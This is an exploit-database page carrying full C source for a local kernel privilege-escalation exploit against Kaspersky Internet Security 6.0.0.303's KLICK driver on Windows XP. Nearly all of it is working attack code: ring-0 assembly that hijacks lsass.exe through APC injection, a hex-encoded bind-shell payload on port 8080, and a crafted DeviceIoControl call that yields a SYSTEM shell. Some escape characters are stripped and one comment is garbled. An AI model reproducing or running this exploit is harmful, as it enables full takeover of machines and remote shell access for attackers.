Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Kaspersky Internet Security 6.0.0.303 IOCTL KLICK Local Exploit
# Published : 2006-10-29
# Author : Nanika
# Previous Title : Xcode OpenBase <= 10.0.0 (unsafe system call) Local Root Exploit (OSX)
# Next Title : XMPlay 3.3.0.4 (M3U Filename) Local Buffer Overflow Exploit
////////////////////////////////////
///// AVP (Kaspersky) 
////////////////////////////////////
//// FOR EDUCATIONAL PURPOSES ONLY
//// Kernel Privilege Escalation #2
//// Exploit
//// Rubén Santamarta 
//// www.reversemode.com
//// 01/09/2006
////
////
////Modify by Nanika
////naninb[at]gmail.com
////nanika[at]chroot.org
////Exploit Get SYSTEM SHELL PORT 8080
////WindowsXP Version SP2+ Kaspersky Internet Security 6.0.0.303
////Do not Enable Hardware DEP
////Reference:
////http://hitcon.org/download/2005/Windows_Kernel_Shellcode_Exploit.pdf
////http://research.eeye.com/html/Papers/download/StepIntoTheRing.pdf
////http://www.security.org.sg/code/sdtrestore.html
////http://www.reversemode.com/
////
////
////
////I AM NOT Japanese :P
////§?±?ˉàμ1¤@¨???¨sKernel Exploitao¤H|3¤@¨?à°§U
////¤à¨é?O|3ˉqao
////////////////////////////////////
#define sysenter __asm __emit 0x0f __asm __emit 0x34



#include <windows.h>
#include <stdio.h>

#define STATUS_SUCCESS					((NTSTATUS)0x00000000L)
#define STATUS_INFO_LENGTH_MISMATCH		((NTSTATUS)0xC0000004L)
#define OBJ_CASE_INSENSITIVE			0x00000040L
#define PAGE_READONLY					0x02
#define PAGE_READWRITE					0x04
#define DEF_KERNEL_BASE					0x80400000L
#define	SystemModuleInformation			11
#define PROT_MEMBASE					0x80000000

typedef LONG	NTSTATUS;
typedef struct _SYSTEM_MODULE_INFORMATION
{
	ULONG Reserved[2];
	PVOID Base;
	ULONG Size;
	ULONG Flags;
	USHORT Index;
	USHORT Unknown;
	USHORT LoadCount;
	USHORT ModuleNameOffset;
	CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION;

NTSTATUS (WINAPI * _NtQuerySystemInformation)(UINT, PVOID, ULONG, PULONG);


HINSTANCE base;

DWORD *kbase;
int *ExAllocatePool;
int *KeInitializeApc;
int *KeInsertQueueApc;
int *ZwYieldExecution;


unsigned char code[] =
//USER MODE Shellcode bind port 8080
//470bytes
"x90x90x90x90x90"
"x83xecx34x8bxf4xe8x47x01x00x00x89x06xffx36x68x8e"
"x4ex0execxe8x61x01x00x00x89x46x08xffx36x68xadxd9"
"x05xcexe8x52x01x00x00x89x46x0cx68x6cx6cx00x00x68"
"x33x32x2ex64x68x77x73x32x5fx54xffx56x08x89x46x04"
"xffx36x68x72xfexb3x16xe8x2dx01x00x00x89x46x10xff"
"x36x68x7exd8xe2x73xe8x1ex01x00x00x89x46x14xffx76"
"x04x68xcbxedxfcx3bxe8x0ex01x00x00x89x46x18xffx76"
"x04x68xd9x09xf5xadxe8xfex00x00x00x89x46x1cxffx76"
"x04x68xa4x1ax70xc7xe8xeex00x00x00x89x46x20xffx76"
"x04x68xa4xadx2exe9xe8xdex00x00x00x89x46x24xffx76"
"x04x68xe5x49x86x49xe8xcex00x00x00x89x46x28xffx76"
"x04x68xe7x79xc6x79xe8xbex00x00x00x89x46x2cx33xff"
"x81xecx90x01x00x00x54x68x01x01x00x00xffx56x18x50"
"x50x50x50x40x50x40x50xffx56x1cx8bxd8x57x57x68x02"
"x00x1fx90x8bxccx6ax16x51x53xffx56x20x57x53xffx56"
"x24x57x51x53xffx56x28x8bxd0x68x65x78x65x00x68x63"
"x6dx64x2ex89x66x30x83xecx54x8dx3cx24x33xc0x33xc9"
"x83xc1x15xabxe2xfdxc6x44x24x10x44xfex44x24x3dx89"
"x54x24x48x89x54x24x4cx89x54x24x50x8dx44x24x10x54"
"x50x51x51x51x6ax01x51x51xffx76x30x51xffx56x10x8b"
"xccx6axffxffx31xffx56x0cx8bxc8x57xffx56x2cxffx56"
"x14x55x56x64xa1x30x00x00x00x85xc0x78x0cx8bx40x0c"
"x8bx70x1cxadx8bx68x08xebx09x8bx40x34x8bxa8xb8x00"
"x00x00x8bxc5x5ex5dxc2x04x00x53x55x56x57x8bx6cx24"
"x18x8bx45x3cx8bx54x05x78x03xd5x8bx4ax18x8bx5ax20"
"x03xddxe3x32x49x8bx34x8bx03xf5x33xffxfcx33xc0xac"
"x3axc4x74x07xc1xcfx0dx03xf8xebxf2x3bx7cx24x14x75"
"xe1x8bx5ax24x03xddx66x8bx0cx4bx8bx5ax1cx03xddx8b"
"x04x8bx03xc5xebx02x33xc0x8bxd5x5fx5ex5dx5bxc2x04"
"x00";

void Ring0Function()
{
	/*
     printf("----[RING0]----n");
     printf("Hello From Ring0!n");
     printf("----[RING0]----nn");
	 WinExec("cmd.exe",SW_SHOW);
	 */
 __asm
    {
     nop
     nop
     nop
     nop
     nop
     nop
     nop
     nop

/*start here*/


    mov        eax,fs:[0x124]//TEB
    mov        esi,[eax+0x44]//EPROCESS
    mov        eax,esi

    
search:
    mov        eax,[eax+0x88]   //activeprocess
    sub        eax,0x88


   // cmp        dword ptr[eax+0x84],0x444//EPROCESS_PID
	cmp dword ptr[eax+0x174],'sasl'//FileName lsass.exe
    jne        search
   
   // mov        ebx,dword ptr[eax+0xc8]//system token
    mov  ebx,eax
    
   

	lea  esi,code//code

    mov ecx,0x1d6// code = 0x1d6

	mov dword ptr[edi],0xffdf0800//Kernel ffdf0000=user 7ffe0000
	push edi
	mov edi,[edi]
	rep movsb
	pop edi


    mov        ecx,dword ptr[ebx+0x190]
finddelay:
	mov ecx,[ecx]
    cmp byte ptr[ecx-0x1ff],0x5//1ff =ethread list - state 0x5=wait
	jnz finddelay
    sub ecx,0x22c
    mov ebp,ecx

	push 0x30//APC Object sizeof
	push 0 //Nonpage
	mov eax,ExAllocatePool//ExAllocatePool for APC Object
    call eax//call ExAllocatePool
    mov esi,eax
	xor edx,edx
	push edx//NULL
	push 01//UserMode
//	push dword ptr[edi]//user mode shellcode
    mov eax,0x7ffe0800//user mode shellcode
    push eax//User Mode routine
	push edx//NULL
	mov eax,ZwYieldExecution//0x804dd668//804dd237=kernel routine ret
	push eax//Kernel Mode routine
	push edx//NULL
	push ebp//ETHREAD
	push esi//APC object
	mov eax,KeInitializeApc  //initialize APC
	call eax


	xor ecx,ecx
	xor edx,edx
    xor eax,eax
    push eax
	push eax
	push ebp//ETHREAD
	push esi//APC Object
	mov eax,KeInsertQueueApc
	call eax

//    test eax,eax
//	jz recall

	mov byte ptr[ebp+0x4a],0x1

/*
	push 0x80000000
	push 0
	push 0
	mov eax,0x804dd4b8
	call eax
*/
/*
yeldloop:
	mov eax,0x804df4d5
	call eax
	jmp yeldloop
*/

    iretd
/*end here*/
     int 3
     NOP
     NOP
     NOP
     NOP
     NOP
     NOP
     NOP
     NOP
     
    }

     exit(1);
	 //printf("WindowsXP Version :Pnn");
}
BOOL getNativeAPIs(void)
{
HMODULE hntdll;

hntdll = GetModuleHandle("ntdll.dll");

	*(FARPROC *)&_NtQuerySystemInformation =
		GetProcAddress(hntdll, "ZwQuerySystemInformation");

if(_NtQuerySystemInformation)
{
		return TRUE;
	}
	return FALSE;

}


DWORD getKernelBase(void)
{
	HANDLE hHeap = GetProcessHeap();
	
	NTSTATUS Status;
    ULONG cbBuffer = 0x8000;
    PVOID pBuffer = NULL;
	DWORD retVal = DEF_KERNEL_BASE;

    do
    {
		pBuffer = HeapAlloc(hHeap, 0, cbBuffer);
		if (pBuffer == NULL)
			return DEF_KERNEL_BASE;

		Status = _NtQuerySystemInformation(SystemModuleInformation,
					pBuffer, cbBuffer, NULL);

		if(Status == STATUS_INFO_LENGTH_MISMATCH)
		{
			HeapFree(hHeap, 0, pBuffer);
			cbBuffer *= 2;
		}
		else if(Status != STATUS_SUCCESS)
		{
			HeapFree(hHeap, 0, pBuffer);
			return DEF_KERNEL_BASE;
		}
    }
    while (Status == STATUS_INFO_LENGTH_MISMATCH);

	DWORD numEntries = *((DWORD *)pBuffer);
	SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)((char *)pBuffer + sizeof(DWORD));

	for(DWORD i = 0; i < numEntries; i++)
	{
		if(strcmpi(smi->ImageName, "ntoskrnl.exe"))
		{
			printf("%.8X - %sn", smi->Base, smi->ImageName);
			retVal = (DWORD)(smi->Base);
			break;
		}
		smi++;
	}

	HeapFree(hHeap, 0, pBuffer);

	return retVal;
}
VOID ShowError()
{
 LPVOID lpMsgBuf;
 FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
               NULL,
               GetLastError(),
               MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
               (LPTSTR) &lpMsgBuf,
               0,
               NULL);
 MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
 exit(1);
}

int main(int argc, char *argv[])
{

 DWORD				InBuff[1];			
 DWORD				dwIOCTL,OutSize,InSize,junk;
 HANDLE				hDevice;
 OSVERSIONINFO ov;

system("cls");
printf("#######################n");
printf("## AVP Ring0 Exploit ##n");
printf("#######################n");
printf("Ruben Santamartanwww.reversemode.comnn");
printf("Modify by Nanikann");
printf("naninb[at]gmail.comn");
printf("www.chroot.orgn");
printf("WindowsXP Version SP2+ Kaspersky Internet Security 6.0.0.303 :Pn");



	ov.dwOSVersionInfoSize = sizeof(ov);
	GetVersionEx(&ov);
	if(ov.dwMajorVersion != 5)
	{
		printf("Sorry, this version supports only WinXP.n");
		return 1;
	}

	if(ov.dwMinorVersion != 1)
	{
		printf("Sorry, this version supports only WinXP.n");
		return 1;
	}
getNativeAPIs();

kbase=(unsigned long *)getKernelBase();
base=LoadLibrary("ntoskrnl.exe");

ExAllocatePool=(int *)GetProcAddress(base,"ExAllocatePool");
KeInitializeApc=(int *)GetProcAddress(base,"KeInitializeApc");
KeInsertQueueApc=(int *)GetProcAddress(base,"KeInsertQueueApc");
ZwYieldExecution=(int *)GetProcAddress(base,"ZwYieldExecution");
ExAllocatePool=(int *)((int *)ExAllocatePool - (int *)base+(int *)kbase);
KeInitializeApc=(int *)((int *)KeInitializeApc-(int *)base+(int *)kbase);
KeInsertQueueApc=(int *)((int *)KeInsertQueueApc-(int *)base+(int *)kbase);
ZwYieldExecution=(int *)((int *)ZwYieldExecution-(int *)base+(int *)kbase);
FreeLibrary(base);

hDevice = CreateFile("\\.\KLICK",
                     0,
                     0,
                     NULL,
                     3,
                     0,
                     0);

//////////////////////
///// INFO 
//////////////////////

 if (hDevice == INVALID_HANDLE_VALUE) ShowError();
 printf("[!] KLICK Device Handle [%x]n",hDevice);


 
//////////////////////
///// BUFFERS
//////////////////////
 InSize = 0x8;

 
 InBuff[0] =(DWORD) Ring0Function;  // Ring0 ShellCode Address
 
 //////////////////////
 ///// IOCTL
 //////////////////////

 dwIOCTL = 0x80052110;

 printf("[!] IOCTL [0x%x]nn",dwIOCTL);
 printf("Exploit TEST!!!!!!!!!!nn");
 printf("Telnet x.x.x.x 8080 get SYSTEM shell!!!!!!!!  :Pnn");
 DeviceIoControl(hDevice, 
                 dwIOCTL, 
                 InBuff,0x8,
                 (LPVOID)NULL,0,
                 &junk,  
                 NULL);


 
}

// www.Syue.com [2006-10-29]